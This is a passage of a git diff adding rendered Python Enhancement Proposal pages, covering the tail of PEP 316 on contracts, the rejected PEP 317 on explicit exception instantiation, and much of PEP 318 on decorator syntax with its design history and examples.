+        The message is sent immediately if currently connected.
+        Otherwise, the message is queued locally until a
+        connection is made.
+
+        pre: True # weakens the pre-condition from SimpleMailClient
+        """
+
+    def recv(self):
+        """Gets the next unread mail message.
+
+        Waits until a message is available.
+
+        pre: True # can always be called
+        post: isinstance(__return__, Message)
+        """
+
+
+

Because pre-conditions can only be weakened, a ComplexMailClient can +replace a SimpleMailClient with no fear of breaking existing code.

+
+
+
+

Rationale

+

Except for the following differences, programming-by-contract for +Python mirrors the Eiffel DBC specification [3].

+

Embedding contracts in docstrings is patterned after the doctest +module. It removes the need for extra syntax, ensures that programs +with contracts are backwards-compatible, and no further work is +necessary to have the contracts included in the docs.

+

The keywords pre, post, and inv were chosen instead of the +Eiffel-style REQUIRE, ENSURE, and INVARIANT because +they’re shorter, more in line with mathematical notation, and for a +more subtle reason: the word ‘require’ implies caller +responsibilities, while ‘ensure’ implies provider guarantees. Yet +pre-conditions can fail through no fault of the caller when using +multiple inheritance, and post-conditions can fail through no fault of +the function when using multiple threads.

+

Loop invariants as used in Eiffel are unsupported. They’re a pain to +implement, and not part of the documentation anyway.

+

The variable names __old__ and __return__ were picked to avoid +conflicts with the return keyword and to stay consistent with +Python naming conventions: they’re public and provided by the Python +implementation.

+

Having variable declarations after a post keyword describes exactly +what the function or method is allowed to modify. This removes the +need for the NoChange syntax in Eiffel, and makes the +implementation of __old__ much easier. It also is more in line +with Z schemas [9], which are divided into two parts: declaring what +changes followed by limiting the changes.

+

Shallow copies of variables for the __old__ value prevent an +implementation of contract programming from slowing down a system too +much. If a function changes values that wouldn’t be caught by a +shallow copy, it can declare the changes like so:

+
post[self, self.obj, self.obj.p]
+
+
+

The forall, exists, and implies functions were added after +spending some time documenting existing functions with contracts. +These capture a majority of common specification idioms. It might +seem that defining implies as a function might not work (the +arguments are evaluated whether needed or not, in contrast with other +boolean operators), but it works for contracts since there should be +no side-effects for any expression in a contract.

+
+
+

Reference Implementation

+

A reference implementation is available [1]. It replaces existing +functions with new functions that do contract checking, by directly +changing the class’ or module’s namespace.

+

Other implementations exist that either hack __getattr__ [5] +or use __metaclass__ [6].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0316.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0317/index.html b/pep-0317/index.html new file mode 100644 index 00000000000..d455b898611 --- /dev/null +++ b/pep-0317/index.html @@ -0,0 +1,569 @@ + + + + + + + + PEP 317 – Eliminate Implicit Exception Instantiation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 317 – Eliminate Implicit Exception Instantiation

+
+
Author:
+
Steven Taschuk <staschuk at telusplanet.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
06-May-2003
+
Python-Version:
+
2.4
+
Post-History:
+
09-Jun-2003
+
+
+
+
Table of Contents +
+
+

Abstract

+
+
“For clarity in new code, the form raise class(argument, ...) +is recommended (i.e. make an explicit call to the constructor).”

—Guido van Rossum, in 1997 [1]

+
+

This PEP proposes the formal deprecation and eventual elimination of +forms of the raise statement which implicitly instantiate an +exception. For example, statements such as

+
raise HullBreachError
+raise KitchenError, 'all out of baked beans'
+
+
+

must under this proposal be replaced with their synonyms

+
raise HullBreachError()
+raise KitchenError('all out of baked beans')
+
+
+

Note that these latter statements are already legal, and that this PEP +does not change their meaning.

+

Eliminating these forms of raise makes it impossible to use string +exceptions; accordingly, this PEP also proposes the formal deprecation +and eventual elimination of string exceptions.

+

Adoption of this proposal breaks backwards compatibility. Under the +proposed implementation schedule, Python 2.4 will introduce warnings +about uses of raise which will eventually become incorrect, and +Python 3.0 will eliminate them entirely. (It is assumed that this +transition period – 2.4 to 3.0 – will be at least one year long, to +comply with the guidelines of PEP 5.)

+
+
+

Motivation

+
+

String Exceptions

+

It is assumed that removing string exceptions will be uncontroversial, +since it has been intended since at least Python 1.5, when the +standard exception types were changed to classes [1].

+

For the record: string exceptions should be removed because the +presence of two kinds of exception complicates the language without +any compensation. Instance exceptions are superior because, for +example,

+
    +
  • the class-instance relationship more naturally expresses the +relationship between the exception type and value,
  • +
  • they can be organized naturally using superclass-subclass +relationships, and
  • +
  • they can encapsulate error-reporting behaviour (for example).
  • +
+
+
+

Implicit Instantiation

+

Guido’s 1997 essay [1] on changing the standard exceptions into +classes makes clear why raise can instantiate implicitly:

+
+
“The raise statement has been extended to allow raising a class +exception without explicit instantiation. The following forms, +called the “compatibility forms” of the raise statement […] The +motivation for introducing the compatibility forms was to allow +backward compatibility with old code that raised a standard +exception.”
+

For example, it was desired that pre-1.5 code which used string +exception syntax such as

+
raise TypeError, 'not an int'
+
+
+

would work both on versions of Python in which TypeError was a +string, and on versions in which it was a class.

+

When no such consideration obtains – that is, when the desired +exception type is not a string in any version of the software which +the code must support – there is no good reason to instantiate +implicitly, and it is clearer not to. For example:

+
    +
  1. In the code
    try:
    +    raise MyError, raised
    +except MyError, caught:
    +    pass
    +
    +
    +

    the syntactic parallel between the raise and except +statements strongly suggests that raised and caught refer +to the same object. For string exceptions this actually is the +case, but for instance exceptions it is not.

    +
  2. +
  3. When instantiation is implicit, it is not obvious when it occurs, +for example, whether it occurs when the exception is raised or when +it is caught. Since it actually happens at the raise, the code +should say so.

    (Note that at the level of the C API, an exception can be “raised” +and “caught” without being instantiated; this is used as an +optimization by, for example, PyIter_Next. But in Python, no +such optimization is or should be available.)

    +
  4. +
  5. An implicitly instantiating raise statement with no arguments, +such as
    raise MyError
    +
    +
    +

    simply does not do what it says: it does not raise the named +object.

    +
  6. +
  7. The equivalence of
    raise MyError
    +raise MyError()
    +
    +
    +

    conflates classes and instances, creating a possible source of +confusion for beginners. (Moreover, it is not clear that the +interpreter could distinguish between a new-style class and an +instance of such a class, so implicit instantiation may be an +obstacle to any future plan to let exceptions be new-style +objects.)

    +
  8. +
+

In short, implicit instantiation has no advantages other than +backwards compatibility, and so should be phased out along with what +it exists to ensure compatibility with, namely, string exceptions.

+
+
+
+

Specification

+

The syntax of raise_stmt [3] is to be changed from

+
raise_stmt ::= "raise" [expression ["," expression ["," expression]]]
+
+
+

to

+
raise_stmt ::= "raise" [expression ["," expression]]
+
+
+

If no expressions are present, the raise statement behaves as it +does presently: it re-raises the last exception that was active in the +current scope, and if no exception has been active in the current +scope, a TypeError is raised indicating that this is the problem.

+

Otherwise, the first expression is evaluated, producing the raised +object. Then the second expression is evaluated, if present, +producing the substituted traceback. If no second expression is +present, the substituted traceback is None.

+

The raised object must be an instance. The class of the instance is +the exception type, and the instance itself is the exception value. +If the raised object is not an instance – for example, if it is a +class or string – a TypeError is raised.

+

If the substituted traceback is not None, it must be a traceback +object, and it is substituted instead of the current location as the +place where the exception occurred. If it is neither a traceback +object nor None, a TypeError is raised.

+
+
+

Backwards Compatibility

+
+

Migration Plan

+
+

Future Statement

+

Under the PEP 236 future statement:

+
from __future__ import raise_with_two_args
+
+
+

the syntax and semantics of the raise statement will be as +described above. This future feature is to appear in Python 2.4; its +effect is to become standard in Python 3.0.

+

As the examples below illustrate, this future statement is only needed +for code which uses the substituted traceback argument to raise; +simple exception raising does not require it.

+
+
+

Warnings

+

Three new warnings, all of category DeprecationWarning, are +to be issued to point out uses of raise which will become +incorrect under the proposed changes.

+

The first warning is issued when a raise statement is executed in +which the first expression evaluates to a string. The message for +this warning is:

+
raising strings will be impossible in the future
+
+
+

The second warning is issued when a raise statement is executed in +which the first expression evaluates to a class. The message for this +warning is:

+
raising classes will be impossible in the future
+
+
+

The third warning is issued when a raise statement with three +expressions is compiled. (Not, note, when it is executed; this is +important because the SyntaxError which this warning presages will +occur at compile-time.) The message for this warning is:

+
raising with three arguments will be impossible in the future
+
+
+

These warnings are to appear in Python 2.4, and disappear in Python +3.0, when the conditions which cause them are simply errors.

+
+
+
+

Examples

+
+

Code Using Implicit Instantiation

+

Code such as

+
class MyError(Exception):
+    pass
+
+raise MyError, 'spam'
+
+
+

will issue a warning when the raise statement is executed. The +raise statement should be changed to instantiate explicitly:

+
raise MyError('spam')
+
+
+
+
+

Code Using String Exceptions

+

Code such as

+
MyError = 'spam'
+raise MyError, 'eggs'
+
+
+

will issue a warning when the raise statement is executed. The +exception type should be changed to a class:

+
class MyError(Exception):
+    pass
+
+
+

and, as in the previous example, the raise statement should be +changed to instantiate explicitly

+
raise MyError('eggs')
+
+
+
+
+

Code Supplying a Traceback Object

+

Code such as

+
raise MyError, 'spam', mytraceback
+
+
+

will issue a warning when compiled. The statement should be changed +to

+
raise MyError('spam'), mytraceback
+
+
+

and the future statement

+
from __future__ import raise_with_two_args
+
+
+

should be added at the top of the module. Note that adding this +future statement also turns the other two warnings into errors, so the +changes described in the previous examples must also be applied.

+

The special case

+
raise sys.exc_type, sys.exc_info, sys.exc_traceback
+
+
+

(which is intended to re-raise a previous exception) should be changed +simply to

+
raise
+
+
+
+
+

A Failure of the Plan

+

It may occur that a raise statement which raises a string or +implicitly instantiates is not executed in production or testing +during the phase-in period for this PEP. In that case, it will not +issue any warnings, but will instead suddenly fail one day in Python +3.0 or a subsequent version. (The failure is that the wrong exception +gets raised, namely a TypeError complaining about the arguments to +raise, instead of the exception intended.)

+

Such cases can be made rarer by prolonging the phase-in period; they +cannot be made impossible short of issuing at compile-time a warning +for every raise statement.

+
+
+
+
+

Rejection

+

If this PEP were accepted, nearly all existing Python code would need +to be reviewed and probably revised; even if all the above arguments +in favour of explicit instantiation are accepted, the improvement in +clarity is too minor to justify the cost of doing the revision and the +risk of new bugs introduced thereby.

+

This proposal has therefore been rejected [6].

+

Note that string exceptions are slated for removal independently of +this proposal; what is rejected is the removal of implicit exception +instantiation.

+
+
+

Summary of Discussion

+

A small minority of respondents were in favour of the proposal, but +the dominant response was that any such migration would be costly +out of proportion to the putative benefit. As noted above, this +point is sufficient in itself to reject the PEP.

+
+

New-Style Exceptions

+

Implicit instantiation might conflict with future plans to allow +instances of new-style classes to be used as exceptions. In order to +decide whether to instantiate implicitly, the raise machinery must +determine whether the first argument is a class or an instance – but +with new-style classes there is no clear and strong distinction.

+

Under this proposal, the problem would be avoided because the +exception would already have been instantiated. However, there are +two plausible alternative solutions:

+
    +
  1. Require exception types to be subclasses of Exception, and +instantiate implicitly if and only if
    issubclass(firstarg, Exception)
    +
    +
    +
  2. +
  3. Instantiate implicitly if and only if
    isinstance(firstarg, type)
    +
    +
    +
  4. +
+

Thus eliminating implicit instantiation entirely is not necessary to +solve this problem.

+
+
+

Ugliness of Explicit Instantiation

+

Some respondents felt that the explicitly instantiating syntax is +uglier, especially in cases when no arguments are supplied to the +exception constructor:

+
raise TypeError()
+
+
+

The problem is particularly acute when the exception instance itself +is not of interest, that is, when the only relevant point is the +exception type:

+
try:
+    # ... deeply nested search loop ...
+        raise Found
+except Found:
+    # ...
+
+
+

In such cases the symmetry between raise and except can be +more expressive of the intent of the code.

+

Guido opined that the implicitly instantiating syntax is “a tad +prettier” even for cases with a single argument, since it has less +punctuation.

+
+
+

Performance Penalty of Warnings

+

Experience with deprecating apply() shows that use of the warning +framework can incur a significant performance penalty.

+

Code which instantiates explicitly would not be affected, since the +run-time checks necessary to determine whether to issue a warning are +exactly those which are needed to determine whether to instantiate +implicitly in the first place. That is, such statements are already +incurring the cost of these checks.

+

Code which instantiates implicitly would incur a large cost: timing +trials indicate that issuing a warning (whether it is suppressed or +not) takes about five times more time than simply instantiating, +raising, and catching an exception.

+

This penalty is mitigated by the fact that raise statements are +rarely on performance-critical execution paths.

+
+
+

Traceback Argument

+

As the proposal stands, it would be impossible to use the traceback +argument to raise conveniently with all 2.x versions of Python.

+

For compatibility with versions < 2.4, the three-argument form must be +used; but this form would produce warnings with versions >= 2.4. +Those warnings could be suppressed, but doing so is awkward because +the relevant type of warning is issued at compile-time.

+

If this PEP were still under consideration, this objection would be +met by extending the phase-in period. For example, warnings could +first be issued in 3.0, and become errors in some later release.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0317.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0318/index.html b/pep-0318/index.html new file mode 100644 index 00000000000..265eed5d1fb --- /dev/null +++ b/pep-0318/index.html @@ -0,0 +1,838 @@ + + + + + + + + PEP 318 – Decorators for Functions and Methods | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 318 – Decorators for Functions and Methods

+
+
Author:
+
Kevin D. Smith <Kevin.Smith at theMorgue.org>, Jim J. Jewett, Skip Montanaro, Anthony Baxter
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Jun-2003
+
Python-Version:
+
2.4
+
Post-History:
+
09-Jun-2003, 10-Jun-2003, 27-Feb-2004, 23-Mar-2004, 30-Aug-2004, +02-Sep-2004
+
+
+
+
Table of Contents +
+
+

WarningWarningWarning

+

This document is meant to describe the decorator syntax and the +process that resulted in the decisions that were made. It does not +attempt to cover the huge number of potential alternative syntaxes, +nor is it an attempt to exhaustively list all the positives and +negatives of each form.

+
+
+

Abstract

+

The current method for transforming functions and methods (for instance, +declaring them as a class or static method) is awkward and can lead to +code that is difficult to understand. Ideally, these transformations +should be made at the same point in the code where the declaration +itself is made. This PEP introduces new syntax for transformations of a +function or method declaration.

+
+
+

Motivation

+

The current method of applying a transformation to a function or method +places the actual transformation after the function body. For large +functions this separates a key component of the function’s behavior from +the definition of the rest of the function’s external interface. For +example:

+
def foo(self):
+    perform method operation
+foo = classmethod(foo)
+
+
+

This becomes less readable with longer methods. It also seems less +than pythonic to name the function three times for what is conceptually +a single declaration. A solution to this problem is to move the +transformation of the method closer to the method’s own declaration. +The intent of the new syntax is to replace

+
def foo(cls):
+    pass
+foo = synchronized(lock)(foo)
+foo = classmethod(foo)
+
+
+

with an alternative that places the decoration in the function’s +declaration:

+
@classmethod
+@synchronized(lock)
+def foo(cls):
+    pass
+
+
+

Modifying classes in this fashion is also possible, though the benefits +are not as immediately apparent. Almost certainly, anything which could +be done with class decorators could be done using metaclasses, but +using metaclasses is sufficiently obscure that there is some attraction +to having an easier way to make simple modifications to classes. For +Python 2.4, only function/method decorators are being added.

+

PEP 3129 proposes to add class decorators as of Python 2.6.

+
+

Why Is This So Hard?

+

Two decorators (classmethod() and staticmethod()) have been +available in Python since version 2.2. It’s been assumed since +approximately that time that some syntactic support for them would +eventually be added to the language. Given this assumption, one might +wonder why it’s been so difficult to arrive at a consensus. Discussions +have raged off-and-on at times in both comp.lang.python and the +python-dev mailing list about how best to implement function decorators. +There is no one clear reason why this should be so, but a few problems +seem to be most divisive.

+
    +
  • Disagreement about where the “declaration of intent” belongs. +Almost everyone agrees that decorating/transforming a function at the +end of its definition is suboptimal. Beyond that there seems to be no +clear consensus where to place this information.
  • +
  • Syntactic constraints. Python is a syntactically simple language +with fairly strong constraints on what can and can’t be done without +“messing things up” (both visually and with regards to the language +parser). There’s no obvious way to structure this information so +that people new to the concept will think, “Oh yeah, I know what +you’re doing.” The best that seems possible is to keep new users from +creating a wildly incorrect mental model of what the syntax means.
  • +
  • Overall unfamiliarity with the concept. For people who have a +passing acquaintance with algebra (or even basic arithmetic) or have +used at least one other programming language, much of Python is +intuitive. Very few people will have had any experience with the +decorator concept before encountering it in Python. There’s just no +strong preexisting meme that captures the concept.
  • +
  • Syntax discussions in general appear to cause more contention than +almost anything else. Readers are pointed to the ternary operator +discussions that were associated with PEP 308 for another example of +this.
  • +
+
+
+
+

Background

+

There is general agreement that syntactic support is desirable to +the current state of affairs. Guido mentioned syntactic support +for decorators in his DevDay keynote presentation at the 10th +Python Conference, though he later said it was only one of +several extensions he proposed there “semi-jokingly”. Michael Hudson +raised the topic on python-dev shortly after the conference, +attributing the initial bracketed syntax to an earlier proposal on +comp.lang.python by Gareth McCaughan.

+

Class decorations seem like an obvious next step because class +definition and function definition are syntactically similar, +however Guido remains unconvinced, and class decorators will almost +certainly not be in Python 2.4.

+

The discussion continued on and off on python-dev from February +2002 through July 2004. Hundreds and hundreds of posts were made, +with people proposing many possible syntax variations. Guido took +a list of proposals to EuroPython 2004, where a discussion took +place. Subsequent to this, he decided that we’d have the Java-style +@decorator syntax, and this appeared for the first time in 2.4a2. +Barry Warsaw named this the ‘pie-decorator’ syntax, in honor of the +Pie-thon Parrot shootout which occurred around the same time as +the decorator syntax, and because the @ looks a little like a pie. +Guido outlined his case on Python-dev, including this piece +on some of the (many) rejected forms.

+
+
+

On the name ‘Decorator’

+

There’s been a number of complaints about the choice of the name +‘decorator’ for this feature. The major one is that the name is not +consistent with its use in the GoF book. The name ‘decorator’ +probably owes more to its use in the compiler area – a syntax tree is +walked and annotated. It’s quite possible that a better name may turn +up.

+
+
+

Design Goals

+

The new syntax should

+
    +
  • work for arbitrary wrappers, including user-defined callables and +the existing builtins classmethod() and staticmethod(). This +requirement also means that a decorator syntax must support passing +arguments to the wrapper constructor
  • +
  • work with multiple wrappers per definition
  • +
  • make it obvious what is happening; at the very least it should be +obvious that new users can safely ignore it when writing their own +code
  • +
  • be a syntax “that … [is] easy to remember once explained”
  • +
  • not make future extensions more difficult
  • +
  • be easy to type; programs that use it are expected to use it very +frequently
  • +
  • not make it more difficult to scan through code quickly. It should +still be easy to search for all definitions, a particular definition, +or the arguments that a function accepts
  • +
  • not needlessly complicate secondary support tools such as +language-sensitive editors and other “toy parser tools out +there
  • +
  • allow future compilers to optimize for decorators. With the hope of +a JIT compiler for Python coming into existence at some point this +tends to require the syntax for decorators to come before the function +definition
  • +
  • move from the end of the function, where it’s currently hidden, to +the front where it is more in your face
  • +
+

Andrew Kuchling has links to a bunch of the discussions about +motivations and use cases in his blog. Particularly notable is Jim +Huginin’s list of use cases.

+
+
+

Current Syntax

+

The current syntax for function decorators as implemented in Python +2.4a2 is:

+
@dec2
+@dec1
+def func(arg1, arg2, ...):
+    pass
+
+
+

This is equivalent to:

+
def func(arg1, arg2, ...):
+    pass
+func = dec2(dec1(func))
+
+
+

without the intermediate assignment to the variable func. The +decorators are near the function declaration. The @ sign makes it clear +that something new is going on here.

+

The rationale for the order of application (bottom to top) is that it +matches the usual order for function-application. In mathematics, +composition of functions (g o f)(x) translates to g(f(x)). In Python, +@g @f def foo() translates to foo=g(f(foo).

+

The decorator statement is limited in what it can accept – arbitrary +expressions will not work. Guido preferred this because of a gut +feeling.

+

The current syntax also allows decorator declarations to call a +function that returns a decorator:

+
@decomaker(argA, argB, ...)
+def func(arg1, arg2, ...):
+    pass
+
+
+

This is equivalent to:

+
func = decomaker(argA, argB, ...)(func)
+
+
+

The rationale for having a function that returns a decorator is that +the part after the @ sign can be considered to be an expression +(though syntactically restricted to just a function), and whatever +that expression returns is called. See declaration arguments.

+
+
+

Syntax Alternatives

+

There have been a large number of different syntaxes proposed – +rather than attempting to work through these individual syntaxes, it’s +worthwhile to break the syntax discussion down into a number of areas. +Attempting to discuss each possible syntax individually would be an +act of madness, and produce a completely unwieldy PEP.

+
+

Decorator Location

+

The first syntax point is the location of the decorators. For the +following examples, we use the @syntax used in 2.4a2.

+

Decorators before the def statement are the first alternative, and the +syntax used in 2.4a2:

+
@classmethod
+def foo(arg1,arg2):
+    pass
+
+@accepts(int,int)
+@returns(float)
+def bar(low,high):
+    pass
+
+
+

There have been a number of objections raised to this location – the +primary one is that it’s the first real Python case where a line of code +has an effect on a following line. The syntax available in 2.4a3 +requires one decorator per line (in a2, multiple decorators could be +specified on the same line), and the final decision for 2.4 final stayed +one decorator per line.

+

People also complained that the syntax quickly got unwieldy when +multiple decorators were used. The point was made, though, that the +chances of a large number of decorators being used on a single function +were small and thus this was not a large worry.

+

Some of the advantages of this form are that the decorators live outside +the method body – they are obviously executed at the time the function +is defined.

+

Another advantage is that a prefix to the function definition fits +the idea of knowing about a change to the semantics of the code before +the code itself, thus you know how to interpret the code’s semantics +properly without having to go back and change your initial perceptions +if the syntax did not come before the function definition.

+

Guido decided he preferred having the decorators on the line before +the ‘def’, because it was felt that a long argument list would mean that +the decorators would be ‘hidden’

+

The second form is the decorators between the def and the function name, +or the function name and the argument list:

+
def @classmethod foo(arg1,arg2):
+    pass
+
+def @accepts(int,int),@returns(float) bar(low,high):
+    pass
+
+def foo @classmethod (arg1,arg2):
+    pass
+
+def bar @accepts(int,int),@returns(float) (low,high):
+    pass
+
+
+

There are a couple of objections to this form. The first is that it +breaks easily ‘greppability’ of the source – you can no longer search +for ‘def foo(’ and find the definition of the function. The second, +more serious, objection is that in the case of multiple decorators, the +syntax would be extremely unwieldy.

+

The next form, which has had a number of strong proponents, is to have +the decorators between the argument list and the trailing : in the +‘def’ line:

+
def foo(arg1,arg2) @classmethod:
+    pass
+
+def bar(low,high) @accepts(int,int),@returns(float):
+    pass
+
+
+

Guido summarized the arguments against this form (many of which also +apply to the previous form) as:

+
    +
  • it hides crucial information (e.g. that it is a static method) +after the signature, where it is easily missed
  • +
  • it’s easy to miss the transition between a long argument list and a +long decorator list
  • +
  • it’s cumbersome to cut and paste a decorator list for reuse, because +it starts and ends in the middle of a line
  • +
+

The next form is that the decorator syntax goes inside the method body at +the start, in the same place that docstrings currently live:

+
def foo(arg1,arg2):
+    @classmethod
+    pass
+
+def bar(low,high):
+    @accepts(int,int)
+    @returns(float)
+    pass
+
+
+

The primary objection to this form is that it requires “peeking inside” +the method body to determine the decorators. In addition, even though +the code is inside the method body, it is not executed when the method +is run. Guido felt that docstrings were not a good counter-example, and +that it was quite possible that a ‘docstring’ decorator could help move +the docstring to outside the function body.

+

The final form is a new block that encloses the method’s code. For this +example, we’ll use a ‘decorate’ keyword, as it makes no sense with the +@syntax.

+
decorate:
+    classmethod
+    def foo(arg1,arg2):
+        pass
+
+decorate:
+    accepts(int,int)
+    returns(float)
+    def bar(low,high):
+        pass
+
+
+

This form would result in inconsistent indentation for decorated and +undecorated methods. In addition, a decorated method’s body would start +three indent levels in.

+
+
+

Syntax forms

+
    +
  • @decorator:
    @classmethod
    +def foo(arg1,arg2):
    +    pass
    +
    +@accepts(int,int)
    +@returns(float)
    +def bar(low,high):
    +    pass
    +
    +
    +

    The major objections against this syntax are that the @ symbol is +not currently used in Python (and is used in both IPython and Leo), +and that the @ symbol is not meaningful. Another objection is that +this “wastes” a currently unused character (from a limited set) on +something that is not perceived as a major use.

    +
  • +
  • |decorator:
    |classmethod
    +def foo(arg1,arg2):
    +    pass
    +
    +|accepts(int,int)
    +|returns(float)
    +def bar(low,high):
    +    pass
    +
    +
    +

    This is a variant on the @decorator syntax – it has the advantage +that it does not break IPython and Leo. Its major disadvantage +compared to the @syntax is that the | symbol looks like both a capital +I and a lowercase l.

    +
  • +
  • list syntax:
    [classmethod]
    +def foo(arg1,arg2):
    +    pass
    +
    +[accepts(int,int), returns(float)]
    +def bar(low,high):
    +    pass
    +
    +
    +

    The major objection to the list syntax is that it’s currently +meaningful (when used in the form before the method). It’s also +lacking any indication that the expression is a decorator.

    +
  • +
  • list syntax using other brackets (<...>, [[...]], …):
    <classmethod>
    +def foo(arg1,arg2):
    +    pass
    +
    +<accepts(int,int), returns(float)>
    +def bar(low,high):
    +    pass
    +
    +
    +

    None of these alternatives gained much traction. The alternatives +which involve square brackets only serve to make it obvious that the +decorator construct is not a list. They do nothing to make parsing any +easier. The ‘<…>’ alternative presents parsing problems because ‘<’ +and ‘>’ already parse as un-paired. They present a further parsing +ambiguity because a right angle bracket might be a greater than symbol +instead of a closer for the decorators.

    +
  • +
  • decorate()

    The decorate() proposal was that no new syntax be implemented +– instead a magic function that used introspection to manipulate +the following function. Both Jp Calderone and Philip Eby produced +implementations of functions that did this. Guido was pretty firmly +against this – with no new syntax, the magicness of a function like +this is extremely high:

    +
    +
    Using functions with “action-at-a-distance” through sys.settraceback +may be okay for an obscure feature that can’t be had any other +way yet doesn’t merit changes to the language, but that’s not +the situation for decorators. The widely held view here is that +decorators need to be added as a syntactic feature to avoid the +problems with the postfix notation used in 2.2 and 2.3. Decorators +are slated to be an important new language feature and their +design needs to be forward-looking, not constrained by what can be +implemented in 2.3.
    +
  • +
  • new keyword (and block)

    This idea was the consensus alternate from comp.lang.python (more +on this in Community Consensus below.) Robert Brewer wrote up a +detailed J2 proposal document outlining the arguments in favor of +this form. The initial issues with this form are:

    +
      +
    • It requires a new keyword, and therefore a from __future__ +import decorators statement.
    • +
    • The choice of keyword is contentious. However using emerged +as the consensus choice, and is used in the proposal and +implementation.
    • +
    • The keyword/block form produces something that looks like a normal +code block, but isn’t. Attempts to use statements in this block +will cause a syntax error, which may confuse users.
    • +
    +

    A few days later, Guido rejected the proposal on two main grounds, +firstly:

    +
    +
    … the syntactic form of an indented block strongly +suggests that its contents should be a sequence of statements, but +in fact it is not – only expressions are allowed, and there is an +implicit “collecting” of these expressions going on until they can +be applied to the subsequent function definition. …
    +

    and secondly:

    +
    +
    … the keyword starting the line that heads a block +draws a lot of attention to it. This is true for “if”, “while”, +“for”, “try”, “def” and “class”. But the “using” keyword (or any +other keyword in its place) doesn’t deserve that attention; the +emphasis should be on the decorator or decorators inside the suite, +since those are the important modifiers to the function definition +that follows. …
    +

    Readers are invited to read the full response.

    +
  • +
  • Other forms

    There are plenty of other variants and proposals on the wiki page.

    +
  • +
+
+
+

Why @?

+

There is some history in Java using @ initially as a marker in Javadoc +comments and later in Java 1.5 for annotations, which are similar +to Python decorators. The fact that @ was previously unused as a token +in Python also means it’s clear there is no possibility of such code +being parsed by an earlier version of Python, leading to possibly subtle +semantic bugs. It also means that ambiguity of what is a decorator +and what isn’t is removed. That said, @ is still a fairly arbitrary +choice. Some have suggested using | instead.

+

For syntax options which use a list-like syntax (no matter where it +appears) to specify the decorators a few alternatives were proposed: +[|...|], *[...]*, and <...>.

+
+
+
+

Current Implementation, History

+

Guido asked for a volunteer to implement his preferred syntax, and Mark +Russell stepped up and posted a patch to SF. This new syntax was +available in 2.4a2.

+
@dec2
+@dec1
+def func(arg1, arg2, ...):
+    pass
+
+
+

This is equivalent to:

+
def func(arg1, arg2, ...):
+    pass
+func = dec2(dec1(func))
+
+
+

though without the intermediate creation of a variable named func.

+

The version implemented in 2.4a2 allowed multiple @decorator clauses +on a single line. In 2.4a3, this was tightened up to only allowing one +decorator per line.

+

A previous patch from Michael Hudson which implements the +list-after-def syntax is also still kicking around.

+

After 2.4a2 was released, in response to community reaction, Guido +stated that he’d re-examine a community proposal, if the community +could come up with a community consensus, a decent proposal, and an +implementation. After an amazing number of posts, collecting a vast +number of alternatives in the Python wiki, a community consensus +emerged (below). Guido subsequently rejected this alternate form, +but added:

+
+
In Python 2.4a3 (to be released this Thursday), everything remains +as currently in CVS. For 2.4b1, I will consider a change of @ to +some other single character, even though I think that @ has the +advantage of being the same character used by a similar feature +in Java. It’s been argued that it’s not quite the same, since @ +in Java is used for attributes that don’t change semantics. But +Python’s dynamic nature makes that its syntactic elements never mean +quite the same thing as similar constructs in other languages, and +there is definitely significant overlap. Regarding the impact on +3rd party tools: IPython’s author doesn’t think there’s going to be +much impact; Leo’s author has said that Leo will survive (although +it will cause him and his users some transitional pain). I actually +expect that picking a character that’s already used elsewhere in +Python’s syntax might be harder for external tools to adapt to, +since parsing will have to be more subtle in that case. But I’m +frankly undecided, so there’s some wiggle room here. I don’t want +to consider further syntactic alternatives at this point: the buck +has to stop at some point, everyone has had their say, and the show +must go on.
+
+

Community Consensus

+

This section documents the rejected J2 syntax, and is included for +historical completeness.

+

The consensus that emerged on comp.lang.python was the proposed J2 +syntax (the “J2” was how it was referenced on the PythonDecorators wiki +page): the new keyword using prefixing a block of decorators before +the def statement. For example:

+
using:
+    classmethod
+    synchronized(lock)
+def func(cls):
+    pass
+
+
+

The main arguments for this syntax fall under the “readability counts” +doctrine. In brief, they are:

+
    +
  • A suite is better than multiple @lines. The using keyword and +block transforms the single-block def statement into a +multiple-block compound construct, akin to try/finally and others.
  • +
  • A keyword is better than punctuation for a new token. A keyword +matches the existing use of tokens. No new token category is +necessary. A keyword distinguishes Python decorators from Java +annotations and .Net attributes, which are significantly different +beasts.
  • +
+

Robert Brewer wrote a detailed proposal for this form, and Michael +Sparks produced a patch.

+

As noted previously, Guido rejected this form, outlining his problems +with it in a message to python-dev and comp.lang.python.

+
+
+
+

Examples

+

Much of the discussion on comp.lang.python and the python-dev +mailing list focuses on the use of decorators as a cleaner way to use +the staticmethod() and classmethod() builtins. This capability +is much more powerful than that. This section presents some examples of +use.

+
    +
  1. Define a function to be executed at exit. Note that the function +isn’t actually “wrapped” in the usual sense.
    def onexit(f):
    +    import atexit
    +    atexit.register(f)
    +    return f
    +
    +@onexit
    +def func():
    +    ...
    +
    +
    +

    Note that this example is probably not suitable for real usage, but +is for example purposes only.

    +
  2. +
  3. Define a class with a singleton instance. Note that once the class +disappears enterprising programmers would have to be more creative to +create more instances. (From Shane Hathaway on python-dev.)
    def singleton(cls):
    +    instances = {}
    +    def getinstance():
    +        if cls not in instances:
    +            instances[cls] = cls()
    +        return instances[cls]
    +    return getinstance
    +
    +@singleton
    +class MyClass:
    +    ...
    +
    +
    +
  4. +
  5. Add attributes to a function. (Based on an example posted by +Anders Munch on python-dev.)
    def attrs(**kwds):
    +    def decorate(f):
    +        for k in kwds:
    +            setattr(f, k, kwds[k])
    +        return f
    +    return decorate
    +
    +@attrs(versionadded="2.2",
    +       author="Guido van Rossum")
    +def mymethod(f):
    +    ...
    +
    +
    +
  6. +
